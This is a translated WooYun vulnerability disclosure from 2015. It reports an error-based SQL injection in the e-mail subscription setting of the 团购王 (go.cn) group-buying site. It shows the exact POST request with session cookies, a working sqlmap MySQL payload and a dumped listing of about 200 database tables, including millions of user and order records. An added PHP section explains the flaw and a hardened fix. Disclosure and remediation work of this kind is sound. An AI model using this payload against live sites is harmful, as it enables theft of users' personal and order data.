Vulnerability summary

Defect ID: wooyun-2015-0134963

Title: Another SQL injection on the 团购王 main site exposes 8.06 million user records and 4.17 million order records

Affected vendor: 团购王

Author: 深度安全实验室

Submitted: 2015-08-18 11:05

Fix time: 2015-08-23 11:06

Public disclosure: 2015-08-23 11:06

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 18

Status: The vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-08-18: Details sent to the vendor, awaiting the vendor's response
2015-08-23: The vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Detailed description:

After logging in, go to the personal center and use the e-mail subscription feature:

91.png


POST /index.php?m=settings HTTP/1.1
Host: www.go.cn
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.go.cn/index.php?m=settings
Cookie: city=51; cityname=anshan; citynames=%E9%9E%8D%E5%B1%B1; history=www.wooyun.org; PHPSESSID=l48jsm5n8isjni7vuoop60tfv3; sessionid_cart=l48jsm5n8isjni7vuoop60tfv3; defaultcityname_head=shenyang; defaultcitychinesename_head=%E6%B2%88%E9%98%B3; __utma=241146517.809255357.1439863430.1439863430.1439863430.1; __utmb=241146517.31.10.1439863430; __utmc=241146517; __utmz=241146517.1439863430.1.1.utmcsr=wooyun.org|utmccn=(referral)|utmcmd=referral|utmcct=/bugs/wooyun-2015-0118425; Hm_lvt_6b810083d1fb4aec26d2e6992d268ee7=1439863430; Hm_lpvt_6b810083d1fb4aec26d2e6992d268ee7=1439865265; _adwb=148565553; _adwc=148565553; _adwp=148565553.5245037997.1439863429.1439863429.1439863429.1; _adwr=148565553%23http%253A%252F%252Fwww.wooyun.org%252Fbugs%252Fwooyun-2015-0118425; CNZZDATA1000130237=1231212462-1439860878-http%253A%252F%252Fwww.wooyun.org%252F%7C1439860878; _jzqa=1.1319235239127696600.1439863441.1439863441.1439863441.1; _jzqb=1.34.10.1439863441.1; _jzqc=1; _jzqx=1.1439863441.1439863441.1.jzqsr=wooyun%2Eorg|jzqct=/bugs/wooyun-2015-0118425.-; _jzqckmp=1; show_add=1; sortby=default; buyurl=http%3A%2F%2Fwww.go.cn%2Fdeal%2Fdeal-1055253.html; return_url=%2Fdeal%2Fdeal-1055253.html; view_goods=%7B%22gid_1055253%22%3A%22gid_1055253%22%7D; login360url=%2Findex.php%3Fm%3Dlogin; return_sourcepage=http%3A%2F%2Fwww.go.cn%2Fdeal%2Fdeal-1055253.html%3Floginsuccess%3Dtrue; login_buy_url=http%3A%2F%2Fwww.go.cn%2Findex.php%3Fm%3Dlogin; codeyama=l48jsm5n8isjni7vuoop60tfv3; __utmt=1; key=Aw9fAAUKCwYMAwdaUAMIUgIIUg4PBlZZDw9ZUwAIDwkLAAIIBQkDBgILAQdYAFJaAQpaBAUKBlADBFY%3D; _qzja=1.1332113766.1439863442365.1439863442365.1439863442365.1439865261416.1439865265369.9670559.1.0.30.1; _qzjb=1.1439863442365.30.0.0.0; _qzjc=1; _qzjto=30.1.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
subscribe=1&do=subscribe

The injection point is the subscribe parameter:

92.png

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: subscribe
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: subscribe=1 AND (SELECT 2426 FROM(SELECT COUNT(*),CONCAT(0x7170767871,(SELECT (CASE WHEN (2426=2426) THEN 1 ELSE 0 END)),0x7171756e71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&do=subscribe
---
back-end DBMS: MySQL >= 5.0.0
Database: go.cn
+-------------------------------------------+---------+
| Table | Entries |
+-------------------------------------------+---------+
| jiuder_source_address_history | 31943364 |
| jiuder_user | 8062637 |
| jiuder_adminlog | 6192775 |
| jiuder_KeywordSearchInfo | 5651043 |
| jiuder_smslog_20130817 | 4231301 |
| jiuder_order | 4174830 |
| jiuder_subway_station_group_relation | 2776647 |
| jiuder_maillog | 2422352 |
| jiuder_useraddress | 2367218 |
| jiuder_network | 2275597 |
| jiuder_usercoupons | 1639316 |
| jiuder_access_info | 1512328 |
| jiuder_creditlog | 1487275 |
| jiuder_brand_click | 1161373 |
| jiuder_supplier_tuikuan_flow_log | 1065049 |
| jiuder_group | 1043867 |
| jiuder_group_copy | 1043867 |
| jiuder_group_copy1 | 1043867 |
| jiuder_baidu_type_group | 1043861 |
| jiuder_group_relation_changecate2 | 1040469 |
| jiuder_group_relation_changecate | 1039236 |
| jiuder_supplier_lalotude | 1032639 |
| jiuder_group_information | 1024431 |
| jiuder_360_type_group | 1004924 |
| jiuder_operation_history | 940140 |
| jiuder_othersites_relation_group | 854442 |
| jiuder_area_business_group_relation | 850113 |
| jiuder_water_table_set | 740059 |
| jiuder_groupcoupons | 736374 |
| jiuder_orderlog | 730278 |
| jiuder_invalid_order | 695579 |
| jiuder_lottery | 675531 |
| jiuder_baidurecord | 475263 |
| jiuder_asyncode_order | 475174 |
| ip_address | 403719 |
| jiuder_smslog | 399842 |
| jiuder_source | 377672 |
| jiuder_user_subjoin | 346186 |
| jiuder_call_log | 340588 |
| jiuder_supplier_schedule | 331731 |
| jiuder_supplier_tuikuan_yunfei | 318747 |
| jiuder_group_property_value | 303649 |
| jiuder_error_log | 274149 |
| jiuder_order_return_log | 216606 |
| jiuder_supplier_tuikuan_flow_log_history | 209341 |
| jiuder_asyncode_order_history | 207810 |
| jiuder_supplier_tuikuan_flow_info | 206542 |
| jiuder_supplier_tuikuan | 198427 |
| jiuder_total_salenum_table | 195616 |
| jiuder_group_relation_type | 157447 |
| jiuder_click_demand | 127518 |
| jiuder_consult | 121302 |
| jiuder_group_property_relation | 120071 |
| jiuder_group_top_gid | 115480 |
| jiuder_order_return | 104925 |
| jiuder_api_visits | 104008 |
| jiuder_complaints | 103539 |
| jiuder_othersites_relation_user | 98315 |
| jiuder_group_oneday_statistics | 97446 |
| jiuder_totalorder | 89062 |
| jiuder_chargecard | 84374 |
| jiuder_KeywordSearchHistory | 84320 |
| jiuder_feedback | 82588 |
| jiuder_ctrip_usetime_change | 75469 |
| jiuder_supplier_tuikuan_flow_info_history | 74400 |
| jiuder_supplier_tuikuan_history | 72770 |
| jiuder_othersites_relation_order | 67580 |
| jiuder_group_property_name | 67258 |
| jiuder_waplog | 58926 |
| jiuder_water_table | 56507 |
| jiuder_luckgame_log | 54031 |
| jiuder_source_address | 52825 |
| jiuder_voucher_order_act | 51440 |
| jiuder_daily_statistic | 51100 |
| jiuder_projects | 41561 |
| jiuder_invite | 37080 |
| jiuder_modify_mobilebind | 33050 |
| jiuder_comeAndSend_rule | 32907 |
| jiuder_holiday | 28506 |
| jiuder_area_and_business | 25055 |
| jiuder_supplier | 22215 |
| jiuder_change_api_gid | 21420 |
| jiuder_group_api_line | 21329 |
| egg_record | 17002 |
| jiuder_maillist | 13299 |
| jiuder_supplier_tuikuan_account | 12600 |
| jiuder_masses_comments | 11658 |
| jiuder_set_jinshan_api | 11650 |
| tmp | 10000 |
| jiuder_redbag | 9870 |
| jiuder_comeAndSend_order | 9705 |
| jiuder_blog | 9667 |
| jiuder_hotel_special | 8671 |
| jiuder_area_and_business_old | 7385 |
| jiuder_group_abnormal | 7286 |
| jiuder_brand_group | 5123 |
| jiuder_advertisement_ip | 4732 |
| jiuder_voucher | 4618 |
| jiuder_area | 3434 |
| jiuder_group_remarks | 3013 |
| tmp1 | 2922 |
| jiuder_user_feedback | 2473 |
| jiuder_sogou_movie_dic | 2385 |
| egg_user | 2284 |
| jiuder_illegal_character | 1997 |
| user_stats | 1849 |
| jiuder_brand | 1796 |
| jiuder_incomestats | 1734 |
| lottery_random | 1692 |
| jiuder_links | 1680 |
| jiuder_subway_real_sta | 1589 |
| jiuder_grouptype_recommend_group | 1492 |
| jiuder_group_infotype_changecate | 1426 |
| jiuder_users_days | 1425 |
| jiuder_subway_station | 1335 |
| jiuder_360_movie_dic | 1333 |
| jiuder_group_type_relation | 1299 |
| jiuder_group_quantity | 1188 |
| jiuder_supplier_schedule_2012 | 1051 |
| jiuder_hotel_busarear | 1030 |
| jiuder_advertisement | 784 |
| jiuder_grouptype_changecate2 | 771 |
| cometchat_guests | 713 |
| jiuder_group_infotype | 575 |
| jiuder_dazhaxie_results | 540 |
| jiuder_city | 521 |
| jiuder_topgroup | 510 |
| jiuder_city_old | 489 |
| jiuder_special_provision | 477 |
| jiuder_gocn2taobao_city | 417 |
| jiuder_360_type_api | 384 |
| jiuder_korea_type | 352 |
| jiuder_group_dis_none | 350 |
| jiuder_grouptype_changecate | 350 |
| jiuder_hot_recommend_group | 346 |
| jiuder_sensitive_keywords | 340 |
| jiuder_baidu_type_api | 304 |
| jiuder_group_type_relation_korea | 298 |
| jiuder_gocn2taobao_category | 286 |
| jiuder_user_manager_relation | 284 |
| jiuder_brand_wangyi | 273 |
| jiuder_manager | 257 |
| jiuder_set_likeorhot | 221 |
| jiuder_gocn2taobao_shopcategory | 195 |
| jiuder_boutique_image | 144 |
| jiuder_lookoo | 140 |
| jiuder_water_initparam | 123 |
| jiuder_gocn2taobao_props | 117 |
| jiuder_suppliersname | 96 |
| jiuder_group_dis_somecity | 89 |
| jiuder_subway | 89 |
| jiuder_asvalue_gratia | 87 |
| jiuder_luckgame_timenum | 82 |
| jiuder_activesubject | 74 |
| jiuder_boutique_group | 70 |
| jiuder_express | 70 |
| jiuder_grouptype | 68 |
| jiuder_dis_360_somecity | 62 |
| jiuder_group_store | 46 |
| cometchat | 40 |
| jiuder_batch_days_type | 37 |
| jiuder_batch_replacement_products | 36 |
| jiuder_set_api_allcity | 27 |
| jiuder_group_layout | 26 |
| jiuder_korea_quantity | 22 |
| jiuder_openapp_open_task | 22 |
| jiuder_hottag | 21 |
| jiuder_batch_reset_list | 20 |
| jiuder_group_warning | 20 |
| jiuder_brand_sort | 19 |
| jiuder_chargecard_log | 18 |
| jiuder_mainvalue_gratia | 17 |
| jiuder_voucher_rule_act | 17 |
| jiuder_water_table_dazhaxie | 16 |
| jiuder_water_basicparam | 15 |
| jiuder_luckgame_prize | 14 |
| jiuder_userprise | 14 |
| jiuder_gocn2taobao_relation | 11 |
| jiuder_hot_recommend_type | 11 |
| jiuder_ads_management | 10 |
| jiuder_openapp_ecode_cancel_task | 10 |
| jiuder_taobao_task_list | 10 |
| cometchat_status | 8 |
| jiuder_boutique_typename | 7 |
| jiuder_set_sougouapi | 7 |
| jiuder_suppliertype | 7 |
| jiuder_Keyword_Default | 6 |
| jiuder_openapp_cooperation | 6 |
| jiuder_change_code | 4 |
| jiuder_gocn2taobao_shopcategory_adapter | 4 |
| jiuder_groupsmslog | 4 |
| jiuder_openapp_ecode_operate_log | 4 |
| jiuder_group_endtime_change | 3 |
| jiuder_openapp_order_relation | 3 |
| jiuder_openapp_user_reg | 3 |
| cif_appinfo | 2 |
| jiuder_ctrip_commission | 2 |
| jiuder_openapp_ecode_cancel_log | 2 |
| jiuder_relation_group | 2 |
| cif_member | 1 |
| jiuder_luckgame_param | 1 |
| jiuder_openapp_main_task | 1 |
| jiuder_plugin | 1 |
| jiuder_site | 1 |
| jiuder_small_sticker | 1 |
| jiuder_wyt_entrance | 1 |
| tbl_session | 1 |
+-------------------------------------------+---------+
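The sqlmap payload above works because the value of subscribe reaches MySQL unquoted, in a numeric context, so "1 AND (SELECT ...)" is simply appended to the statement and the error text carries the extracted data back. As an added illustration (not the site's code; the table name jiuder_user is taken from the listing above, while the column names, the uid session value and the mysqli handle are assumptions), here is that pattern beside a hardened version that validates the flag and binds it as an integer:

```php
<?php
// Added illustration, not the site's code. Table jiuder_user is from the
// report; columns `subscribe` and `uid` are assumed.

// Vulnerable pattern implied by the report: the raw POST value is pasted
// into a numeric expression, so no quote is needed to alter the query.
function set_subscription_vulnerable(mysqli $db, int $uid, string $subscribe): bool
{
    $sql = "UPDATE jiuder_user SET subscribe = $subscribe WHERE uid = $uid";
    $ok = $db->query($sql);
    // Echoing $db->error to the client is what makes error-based
    // extraction possible; this reconstruction does it deliberately.
    if ($ok === false) {
        echo $db->error;
    }
    return $ok !== false;
}

// Hardened version: accept only a recognised boolean, then bind it as an
// integer through a prepared statement so the value can never become SQL.
function set_subscription_safe(mysqli $db, int $uid, $subscribe): bool
{
    // FILTER_NULL_ON_FAILURE makes filter_var return null for anything that
    // is not "1","0","true","false","on","off","yes","no", so a value such
    // as "1 AND (SELECT ...)" is rejected before any query is built.
    $flag = filter_var($subscribe, FILTER_VALIDATE_BOOLEAN, FILTER_NULL_ON_FAILURE);
    if ($flag === null) {
        error_log("settings/subscribe: rejected non-boolean value for uid $uid");
        return false;
    }
    $value = $flag ? 1 : 0;

    $stmt = $db->prepare('UPDATE jiuder_user SET subscribe = ? WHERE uid = ?');
    if ($stmt === false) {
        error_log('settings/subscribe: prepare failed: ' . $db->error); // log, never echo
        return false;
    }
    $stmt->bind_param('ii', $value, $uid);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// Usage sketch for the settings handler (assumed session layout):
// mysqli_report(MYSQLI_REPORT_OFF);          // keep driver errors out of the response
// $db = new mysqli('localhost', 'app', 'secret', 'go.cn');
// set_subscription_safe($db, (int) $_SESSION['uid'], $_POST['subscribe'] ?? '');
```

Rejecting the value rather than coercing it with (int) is deliberate: a failed validation is also a useful detection signal, since legitimate clients only ever send 0 or 1.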

Proof of vulnerability:

User information:

93.png

Order information:

94.png

Fix plan:

Copyright notice: when reprinting, please credit 深度安全实验室@乌云


Vendor response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2015-08-23 11:06

Vendor reply:

Vulnerability Rank: 15 (WooYun rating)

Latest status:

None yet


Vulnerability ratings:

Comments

  1. 2015-08-18 11:06 | Manning ( Regular white hat | Rank:559 Vulns:78 | I just hate having too few servers)

    This one is impressive

  2. 2015-08-18 12:23 | 卖C4的小男孩 ( Intern white hat | Rank:65 Vulns:6 | La la la, la la la, I'm an expert C4 seller!...)

    66666

  3. 2015-08-18 16:49 | 开心一下1313 ( Intern white hat | Rank:63 Vulns:20 | Take a sip of water, calm the nerves......)

    That's a scary amount of data

  4. 2015-08-18 17:39 | 天道酬勤 ( Passer-by | Rank:1 Vulns:1 | Study hard · seek advice · )

    Very impressive

  5. 2015-08-23 11:09 | Alsn ( Intern white hat | Rank:32 Vulns:4 | Searching the vast ocean of the internet for that pair of justice, positive energy...)

    Impressive

  6. 2015-08-23 16:49 | 日出东方 ( Regular white hat | Rank:157 Vulns:51 )

    Vulnerabilities really can turn up anywhere

  7. 2015-08-27 16:41 | DloveJ ( Regular white hat | Rank:1107 Vulns:200 | <a href=javascrip:alert('xss')>s</a> click...)

    @深度安全实验室 Table | Entries | how do you get the entries column to show??

  8. 2015-08-28 15:34 | 开心一下1313 ( Intern white hat | Rank:63 Vulns:20 | Take a sip of water, calm the nerves......)

    @深度安全实验室 Table | Entries how do you get this column to show?? Please advise

  9. 2015-08-28 15:39 | DloveJ ( Regular white hat | Rank:1107 Vulns:200 | <a href=javascrip:alert('xss')>s</a> click...)

    @开心一下1313 --count

  10. 2015-08-28 15:46 | 开心一下1313 ( Intern white hat | Rank:63 Vulns:20 | Take a sip of water, calm the nerves......)

    @深度安全实验室 OK, thanks